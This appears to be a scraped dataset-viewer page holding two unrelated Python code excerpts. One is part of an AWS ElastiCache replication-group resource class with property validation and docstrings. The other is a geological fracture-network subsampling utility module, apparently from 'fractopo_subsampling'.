The password used to access a password protected server. Can be specified only if `transit_encryption_enabled = true`.
"""
__props__['authToken'] = auth_token
if auto_minor_version_upgrade and not isinstance(auto_minor_version_upgrade, bool):
raise TypeError('Expected property auto_minor_version_upgrade to be a bool')
__self__.auto_minor_version_upgrade = auto_minor_version_upgrade
"""
Specifies whether a minor engine upgrades will be applied automatically to the underlying Cache Cluster instances during the maintenance window. Defaults to `true`.
"""
__props__['autoMinorVersionUpgrade'] = auto_minor_version_upgrade
if automatic_failover_enabled and not isinstance(automatic_failover_enabled, bool):
raise TypeError('Expected property automatic_failover_enabled to be a bool')
__self__.automatic_failover_enabled = automatic_failover_enabled
"""
Specifies whether a read-only replica will be automatically promoted to read/write primary if the existing primary fails. If true, Multi-AZ is enabled for this replication group. If false, Multi-AZ is disabled for this replication group. Must be enabled for Redis (cluster mode enabled) replication groups. Defaults to `false`.
"""
__props__['automaticFailoverEnabled'] = automatic_failover_enabled
if availability_zones and not isinstance(availability_zones, list):
raise TypeError('Expected property availability_zones to be a list')
__self__.availability_zones = availability_zones
"""
A list of EC2 availability zones in which the replication group's cache clusters will be created. The order of the availability zones in the list is not important.
"""
__props__['availabilityZones'] = availability_zones
if cluster_mode and not isinstance(cluster_mode, dict):
raise TypeError('Expected property cluster_mode to be a dict')
__self__.cluster_mode = cluster_mode
"""
Create a native redis cluster. `automatic_failover_enabled` must be set to true. Cluster Mode documented below. Only 1 `cluster_mode` block is allowed.
"""
__props__['clusterMode'] = cluster_mode
if engine and not isinstance(engine, basestring):
raise TypeError('Expected property engine to be a basestring')
__self__.engine = engine
"""
The name of the cache engine to be used for the clusters in this replication group. e.g. `redis`
"""
__props__['engine'] = engine
if engine_version and not isinstance(engine_version, basestring):
raise TypeError('Expected property engine_version to be a basestring')
__self__.engine_version = engine_version
"""
The version number of the cache engine to be used for the cache clusters in this replication group.
"""
__props__['engineVersion'] = engine_version
if maintenance_window and not isinstance(maintenance_window, basestring):
raise TypeError('Expected property maintenance_window to be a basestring')
__self__.maintenance_window = maintenance_window
"""
Specifies the weekly time range for when maintenance
on the cache cluster is performed. The format is `ddd:hh24:mi-ddd:hh24:mi` (24H Clock UTC).
The minimum maintenance window is a 60 minute period. Example: `sun:05:00-sun:09:00`
"""
__props__['maintenanceWindow'] = maintenance_window
if node_type and not isinstance(node_type, basestring):
raise TypeError('Expected property node_type to be a basestring')
__self__.node_type = node_type
"""
The compute and memory capacity of the nodes in the node group.
"""
__props__['nodeType'] = node_type
if notification_topic_arn and not isinstance(notification_topic_arn, basestring):
raise TypeError('Expected property notification_topic_arn to be a basestring')
__self__.notification_topic_arn = notification_topic_arn
"""
An Amazon Resource Name (ARN) of an
SNS topic to send ElastiCache notifications to. Example:
`arn:aws:sns:us-east-1:012345678999:my_sns_topic`
"""
__props__['notificationTopicArn'] = notification_topic_arn
if number_cache_clusters and not isinstance(number_cache_clusters, int):
raise TypeError('Expected property number_cache_clusters to be a int')
__self__.number_cache_clusters = number_cache_clusters
"""
The number of cache clusters (primary and replicas) this replication group will have. If Multi-AZ is enabled, the value of this parameter must be at least 2. Updates will occur before other modifications.
"""
__props__['numberCacheClusters'] = number_cache_clusters
if parameter_group_name and not isinstance(parameter_group_name, basestring):
raise TypeError('Expected property parameter_group_name to be a basestring')
__self__.parameter_group_name = parameter_group_name
"""
The name of the parameter group to associate with this replication group. If this argument is omitted, the default cache parameter group for the specified engine is used.
"""
__props__['parameterGroupName'] = parameter_group_name
if port and not isinstance(port, int):
raise TypeError('Expected property port to be a int')
__self__.port = port
"""
The port number on which each of the cache nodes will accept connections. For Memcache the default is 11211, and for Redis the default port is 6379.
"""
__props__['port'] = port
if not replication_group_description:
raise TypeError('Missing required property replication_group_description')
elif not isinstance(replication_group_description, basestring):
raise TypeError('Expected property replication_group_description to be a basestring')
__self__.replication_group_description = replication_group_description
"""
A user-created description for the replication group.
"""
__props__['replicationGroupDescription'] = replication_group_description
if not replication_group_id:
raise TypeError('Missing required property replication_group_id')
elif not isinstance(replication_group_id, basestring):
raise TypeError('Expected property replication_group_id to be a basestring')
__self__.replication_group_id = replication_group_id
"""
The replication group identifier. This parameter is stored as a lowercase string.
"""
__props__['replicationGroupId'] = replication_group_id
if security_group_ids and not isinstance(security_group_ids, list):
raise TypeError('Expected property security_group_ids to be a list')
__self__.security_group_ids = security_group_ids
"""
One or more Amazon VPC security groups associated with this replication group. Use this parameter only when you are creating a replication group in an Amazon Virtual Private Cloud
"""
__props__['securityGroupIds'] = security_group_ids
if security_group_names and not isinstance(security_group_names, list):
raise TypeError('Expected property security_group_names to be a list')
__self__.security_group_names = security_group_names
"""
A list of cache security group names to associate with this replication group.
"""
__props__['securityGroupNames'] = security_group_names
if snapshot_arns and not isinstance(snapshot_arns, list):
raise TypeError('Expected property snapshot_arns to be a list')
__self__.snapshot_arns = snapshot_arns
"""
A single-element string list containing an
Amazon Resource Name (ARN) of a Redis RDB snapshot file stored in Amazon S3.
Example: `arn:aws:s3:::my_bucket/snapshot1.rdb`
"""
__props__['snapshotArns'] = snapshot_arns
if snapshot_name and not isinstance(snapshot_name, basestring):
raise TypeError('Expected property snapshot_name to be a basestring')
__self__.snapshot_name = snapshot_name
"""
The name of a snapshot from which to restore data into the new node group. Changing the `snapshot_name` forces a new resource.
"""
__props__['snapshotName'] = snapshot_name
if snapshot_retention_limit and not isinstance(snapshot_retention_limit, int):
raise TypeError('Expected property snapshot_retention_limit to be a int')
__self__.snapshot_retention_limit = snapshot_retention_limit
"""
The number of days for which ElastiCache will
retain automatic cache cluster snapshots before deleting them. For example, if you set
SnapshotRetentionLimit to 5, then a snapshot that was taken today will be retained for 5 days
before being deleted. If the value of SnapshotRetentionLimit is set to zero (0), backups are turned off.
Please note that setting a `snapshot_retention_limit` is not supported on cache.t1.micro or cache.t2.* cache nodes
"""
__props__['snapshotRetentionLimit'] = snapshot_retention_limit
if snapshot_window and not isinstance(snapshot_window, basestring):
raise TypeError('Expected property snapshot_window to be a basestring')
__self__.snapshot_window = snapshot_window
"""
The daily time range (in UTC) during which ElastiCache will
begin taking a daily snapshot of your cache cluster. The minimum snapshot window is a 60 minute period. Example: `05:00-09:00`
"""
__props__['snapshotWindow'] = snapshot_window
if subnet_group_name and not isinstance(subnet_group_name, basestring):
raise TypeError('Expected property subnet_group_name to be a basestring')
__self__.subnet_group_name = subnet_group_name
"""
The name of the cache subnet group to be used for the replication group.
"""
__props__['subnetGroupName'] = subnet_group_name
if tags and not isinstance(tags, dict):
raise TypeError('Expected property tags to be a dict')
__self__.tags = tags
"""
A mapping of tags to assign to the resource
"""
__props__['tags'] = tags
if transit_encryption_enabled and not isinstance(transit_encryption_enabled, bool):
| |
<gh_stars>0
"""
General utilities for subsampling.
"""
import csv
import logging
import random
from concurrent.futures import ProcessPoolExecutor, as_completed
from enum import Enum, unique
from itertools import compress, count
from pathlib import Path
from subprocess import check_call
from typing import Any, Dict, List, Literal, Optional, Sequence, Tuple, Union
import geopandas as gpd
import numpy as np
import pandas as pd
from matplotlib.axes import Axes
from pandas.core.groupby.generic import DataFrameGroupBy
class Utils:
    """
    General selection, column names, etc. data.
    """

    # Column-name constants used when indexing the analysis dataframes.
    radius = "radius"
    relative_coverage = "relative coverage"
    name = "name"
    trace_power_law_vs_lognormal_r = "trace power_law vs. lognormal R"
    trace_power_law_vs_lognormal_p = "trace power_law vs. lognormal p"

    # Aggregation function ("mean" or "sum") applied per parameter when
    # combining subsampled circles (used by aggregate_chosen via
    # cached_subsampling).
    params_with_func = {
        # "Fracture Intensity (Mauldon)": "mean",
        "Fracture Intensity P21": "mean",
        "Dimensionless Intensity B22": "mean",
        "Connections per Branch": "mean",
        "trace power_law exponent": "mean",
        "trace power_law cut-off": "mean",
        "Number of Traces": "sum",
        "Number of Branches": "sum",
        "radius": "sum",
        "I": "sum",
        "Y": "sum",
        "X": "sum",
        "Trace Boundary 1 Intersect Count": "sum",
        "Trace Boundary 2 Intersect Count": "sum",
        "Trace Boundary 0 Intersect Count": "sum",
        "Trace Mean Length": "mean",
        "Branch Mean Length": "mean",
    }

    # Prettier display names for select parameters (used by param_renamer).
    renamed_params = {
        "trace power_law exponent": "Trace Power-law Exponent",
        "branch power_law exponent": "Branch Power-law Exponent",
    }

    # Parameter subset — presumably the parameters highlighted in focused
    # plots; usage is outside this chunk (TODO confirm).
    selected_params = {
        "Connections per Branch",
        "trace power_law exponent",
        "Fracture Intensity P21",
        "Dimensionless Intensity B22",
    }

    # Parameter subset — presumably the columns included in tabulated
    # output; usage is outside this chunk (TODO confirm).
    table_params = {
        "Fracture Intensity P21",
        "Dimensionless Intensity B22",
        "Connections per Branch",
        "trace power_law exponent",
        "trace power_law cut-off",
        "trace power_law vs. lognormal R",
        "trace power_law vs. lognormal p",
        "Trace Mean Length",
        "Branch Mean Length",
        "Number of Traces",
        "Number of Branches",
        "radius",
        "I",
        "Y",
        "X",
        "E",
        "C - C",
        "C - I",
        "I - I",
    }

    # Unit strings (matplotlib mathtext) keyed by renamed parameter.
    unit_dict = {
        "Fracture Intensity P21": "[$m/m^2$]",
        "Dimensionless Intensity B22": "[-]",
        "Connections per Branch": "[-]",
        "Trace Power-law Exponent": "[-]",
    }
@unique
class Skip(Enum):
    """
    Enums for skip options.
    """

    # Row categories that collect_paths may be told to skip; @unique
    # guarantees the string values stay distinct.
    valid = "valid"
    invalid = "invalid"
    empty = "empty"
# Command line used to invoke this package's scripts as a module.
SCRIPTS_RUN_CMD = "python3 -m fractopo_subsampling"
def param_renamer(param: str):
    """
    Rename param for nicer plotting name.

    If no rename in renamed_params is defined no renaming is done and the
    parameter is returned as-is.
    """
    # Fall back to the original name for parameters without a mapping.
    return Utils.renamed_params.get(param, param)
def random_sample_of_circles(
    grouped: DataFrameGroupBy,
    circle_names_with_diameter: Dict[str, int],
    min_circles: int = 1,
    max_circles: Optional[int] = None,
    min_area: float = 0.0,
    max_area: Optional[float] = None,
) -> List[pd.Series]:
    """
    Get a random sample of circles from grouped subsampled data.

    Both the amount of overall circles and which circles within each group
    is random. Data is grouped by target area name.

    :param grouped: Subsampled circle data grouped by target area name.
    :param circle_names_with_diameter: Base-circle diameter by area name;
        base circles are chosen weighted by their area.
    :param min_circles: Minimum number of base circles to choose.
    :param max_circles: Maximum number of base circles to choose; ``None``
        allows up to one per group.
    :param min_area: Minimum area a subsampled circle must have to be
        eligible within its group.
    :param max_area: Maximum eligible area; ``None`` disables the bound.
    :return: One randomly chosen subsampled circle (``pd.Series`` row) per
        chosen base circle.
    """
    if max_circles is not None:
        assert max_circles >= min_circles
        # NOTE(review): max_circles greater than len(grouped) would exhaust
        # the candidate indexes below and make random.choices fail on an
        # empty population — confirm callers keep it within bounds.
    # Area names
    names = list(grouped.groups.keys())
    # Get area of the base circles corresponding to area name
    areas = [np.pi * (circle_names_with_diameter[name] / 2) ** 2 for name in names]
    # All indexes
    idxs = list(range(0, len(grouped)))
    # "Randomly" choose how many circles
    # Is constrained by given min_circles and max_circles
    how_many = random.randint(
        min_circles, len(grouped) if max_circles is None else max_circles
    )
    # Collect indexes of base circles
    which_idxs = []
    for _ in range(how_many):
        # Only base circles not already chosen remain candidates; the
        # choice is weighted by base-circle area.
        compressor = [idx not in which_idxs for idx in idxs]
        possible_idxs = list(compress(idxs, compressor))
        possible_areas = list(compress(areas, compressor))
        choice = random.choices(population=possible_idxs, weights=possible_areas, k=1)[
            0
        ]
        which_idxs.append(choice)
    assert len(which_idxs) == how_many
    # Collect the Series that are chosen
    chosen: List[pd.Series] = []
    # Iterate over the DataFrameGroupBy dataframe groups
    for idx, (_, group) in enumerate(grouped):
        # Skip if not chosen base circle previously
        if idx not in which_idxs:
            continue
        # radii = group["radius"].values
        # radii_weights = normalize_and_invert_weights(
        #     radii,
        #     max_value=(Utils.circle_names_with_diameter[str(name)] / 2)
        #     if name in Utils.circle_names_with_diameter
        #     else None,
        # )
        # radii_weights = radii
        # Make continuous index from 0
        indexer = count(0)
        indexes = [next(indexer) for _ in group.index.values]
        # If min_area or max_area are given, the choices are filtered
        # accordingly
        if min_area > 0 or max_area is not None:
            # Get circle areas
            areas = group["area"].to_numpy()
            # Solve max_area
            # NOTE(review): max_area resolved from the first constrained
            # group is reused for every later group — confirm intended.
            max_area = np.max(areas) if max_area is None else max_area
            # Filter out areas that do not fit within the range
            area_compressor = [min_area <= area <= max_area for area in areas]
            # Filter out indexes accordingly
            indexes = list(compress(indexes, area_compressor))
            assert len(indexes) > 0
        # Choose from indexes (uniformly within the group)
        choice = random.choices(population=indexes, k=1)[0]
        # Get the Series at choice index
        srs = group.iloc[choice]
        assert isinstance(srs, pd.Series)
        # Collect
        chosen.append(srs)
    assert len(chosen) == how_many
    # Return chosen subsampled circles from base circles
    return chosen
def normalize_and_invert_weights(
    weights: Sequence[float], max_value: Optional[float] = None
) -> Sequence[float]:
    """
    Normalize a list of weights and invert them.

    Each weight is divided by ``max_value`` (defaulting to the maximum of
    *weights*) and subtracted from one, so larger weights map to smaller
    results.
    """
    # An empty sequence is returned untouched.
    if len(weights) == 0:
        return weights
    # Resolve the normalizing denominator; an explicit max_value must
    # bound every weight.
    if max_value is None:
        max_value = max(weights)
    else:
        assert max_value >= max(weights)
    # Normalize each weight into [0, 1] and invert it.
    inverted = []
    for weight in weights:
        inverted.append(1 - weight / max_value)
    return inverted
def numpy_to_python_type(value):
    """
    Convert to Python type from numpy with .item().

    Values without an ``item`` method are returned unchanged.
    """
    try:
        converted = value.item()
    except AttributeError:
        # Already a plain Python value.
        return value
    return converted
def aggregate_chosen(
    chosen: List[pd.Series], params_with_func: Dict[str, str]
) -> Dict[str, Any]:
    """
    Aggregate a collection of subsampled circles for params.

    Weights averages by the area of each subsampled circle.
    """

    def _to_builtin(value):
        # Inlined scalar conversion: numpy scalars expose .item(); plain
        # Python values pass through unchanged.
        try:
            return value.item()
        except AttributeError:
            return value

    # Circle areas are both summed and used as the averaging weights.
    circle_areas = [srs["area"] for srs in chosen]
    total_area = _to_builtin(sum(circle_areas))
    assert isinstance(total_area, (float, int))
    values = {"area": total_area, "circle_count": len(chosen)}
    for param, func in params_with_func.items():
        param_values = [srs[param] for srs in chosen]
        if func == "mean":
            # Area-weighted mean across the chosen circles.
            aggregated = np.average(param_values, weights=circle_areas)
        elif func == "sum":
            aggregated = np.array(param_values).sum()
        else:
            raise ValueError("Expected mean or sum.")
        aggregated = _to_builtin(aggregated)
        assert isinstance(aggregated, (float, int))
        values[param] = aggregated
    return values
def constrain_radius(
    names: np.ndarray, radiuses: np.ndarray, circle_names_with_diameter: Dict[str, int]
) -> List[bool]:
    """
    Constrain dataset radiuses to one fourth of the full diameter.

    Returns one boolean per (name, radius) pair: True when the radius is
    at most a fourth of the named base circle's diameter value.
    """
    booleans: List[bool] = []
    for area_name, area_radius in zip(names, radiuses):
        # Every area must have a known base-circle diameter.
        assert area_name in circle_names_with_diameter
        quarter = circle_names_with_diameter[area_name] / 4
        booleans.append(quarter >= area_radius)
    assert len(booleans) == len(names) == len(radiuses)
    return booleans
def radius_to_area(radius: float):
    """
    Convert circle radius to area.
    """
    # Circle area: pi * r^2.
    return radius ** 2 * np.pi
def area_to_radius(area: float):
    """
    Convert circle area to radius.
    """
    # Invert area = pi * r^2 for r.
    ratio = area / np.pi
    return np.sqrt(ratio)
def filter_dataframe(
    df: Union[gpd.GeoDataFrame, pd.DataFrame],
    filter_names: List[str],
    filter_radius: Tuple[float, float],
    relative_coverage_threshold: float,
) -> Union[gpd.GeoDataFrame, pd.DataFrame]:
    """
    Filter (Geo)DataFrame to input names and thresholds.

    Applies three sequential filters — by area name, by inclusive radius
    range and by relative coverage strictly below the threshold — printing
    how many rows each step removed and asserting rows remain after each.
    """
    start_length = df.shape[0]
    assert start_length > 0

    # 1. Keep only rows whose area name is among filter_names.
    named_df = df.loc[df[Utils.name].isin(filter_names).to_numpy()]
    print(f"Name filtered: {start_length - named_df.shape[0]}")
    assert named_df.shape[0] > 0

    # 2. Keep only rows whose radius lies within the inclusive range.
    low, high = filter_radius
    radius_mask = [low <= val <= high for val in named_df[Utils.radius]]
    radius_df = named_df.loc[radius_mask]
    print(f"Radius filtered: {named_df.shape[0] - radius_df.shape[0] }")
    assert radius_df.shape[0] > 0

    # 3. Keep only rows strictly below the relative coverage threshold.
    coverage_mask = radius_df[Utils.relative_coverage] < relative_coverage_threshold
    coverage_df = radius_df.loc[coverage_mask]
    print(f"Coverage filtered: {radius_df.shape[0] - coverage_df.shape[0] }")
    assert coverage_df.shape[0] > 0
    return coverage_df
def paper_figsize(
    multiplier: float,
    paper_height=11.7,
    paper_width=8.27,
) -> Tuple[float, float]:
    """
    Get figsize for A4.

    The height is scaled by ``multiplier`` but capped at the full paper
    height; the width is always the full paper width.
    """
    capped_height = min(paper_height, paper_height * multiplier)
    return (paper_width, capped_height)
def label_point(
    xs: Sequence[float], ys: Sequence[float], vals: Sequence, ax: Axes, **text_kwargs
):
    """
    Label points in plot.

    Draws ``str(val)`` slightly to the right (+0.02 in data coordinates)
    of each (x, y) point on the given Axes.

    :param xs: X coordinates of the points.
    :param ys: Y coordinates of the points.
    :param vals: Labels; converted with ``str``.
    :param ax: Axes to draw the labels on.
    :param text_kwargs: Extra keyword arguments passed to ``ax.text``.
    """
    # A plain loop instead of a side-effect-only list comprehension, which
    # built and discarded a throwaway list.
    for x, y, val in zip(xs, ys, vals):
        ax.text(x + 0.02, y, str(val), **text_kwargs)
def cached_subsampling(
    dataframe_grouped: DataFrameGroupBy,
    iterations: int,
    savepath: Path,
    circle_names_with_diameter: Dict[str, int],
    subsample_area_limits: Optional[Tuple[float, float]] = None,
):
    """
    Perform subsampling.

    Results are cached at ``savepath``: when the file exists it is read
    and returned instead of recomputing; otherwise ``iterations`` random
    subsamples are aggregated, saved to ``savepath`` and returned.

    :param dataframe_grouped: Subsampled circle data grouped by area name.
    :param iterations: How many random subsamples to aggregate.
    :param savepath: Path of the cache csv file.
    :param circle_names_with_diameter: Base-circle diameter by area name.
    :param subsample_area_limits: Optional (min, max) area constraint for
        circles chosen within each group; ``None`` applies no constraint.
    :return: DataFrame of aggregated subsampling results.
    """
    if savepath.exists():
        # Cache hit: reuse previously computed results.
        # NOTE(review): read_csv/save_csv are not among this module's
        # visible imports — presumably project helpers; confirm.
        agg_df = read_csv(savepath, index_col=[0])
    else:
        # Bug fix: subsample_area_limits defaults to None but was indexed
        # unconditionally ([0]/[1]), raising TypeError with the default.
        # Fall back to "no constraint" when it is not given.
        if subsample_area_limits is None:
            min_area, max_area = 0.0, None
        else:
            min_area, max_area = subsample_area_limits
        agg_df = pd.DataFrame(
            [
                aggregate_chosen(
                    random_sample_of_circles(
                        dataframe_grouped,
                        circle_names_with_diameter,
                        min_area=min_area,
                        max_area=max_area,
                    ),
                    params_with_func=Utils.params_with_func,
                )
                for _ in range(iterations)
            ]
        )
        savepath.parent.mkdir(parents=True, exist_ok=True)
        save_csv(agg_df, savepath, index=True)
    return agg_df
def collect_paths(
csv_path: str,
skip: List[Literal[Skip.empty, Skip.valid, Skip.invalid]],
filter: str = "",
) -> Tuple[List[Path], List[Path], List[Tuple[str, str, float]]]:
"""
Collect trace and area paths from relations.csv file.
"""
if not all([val in Skip for val in skip]):
raise ValueError(f"Expected skip vals to be one of {Skip}.")
traces_paths, area_paths, marks = [], [], []
with Path(csv_path).open("r") as csvfile:
reader = csv.reader(csvfile)
for idx, row in enumerate(reader):
if idx == 0:
continue
base_path = "{}/{}/{}/{}"
area_path = Path(
base_path.format(row[2], "areas", row[3], row[0] + ".gpkg")
).resolve()
traces_path = Path(
base_path.format(row[2], "traces", row[3], row[1] + ".gpkg")
).resolve()
if not (area_path.exists() and traces_path.exists()):
continue
if row[4] == "True" and Skip.valid in skip:
# Do not collect valid.
continue
if row[4] == "False" and Skip.invalid in skip:
# Do not collect invalid.
continue
if row[5] == "True" and Skip.empty in skip:
# Do not collect empty.
continue
if len(filter) > 0 and filter not in area_path.stem:
# Only collect area paths that |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.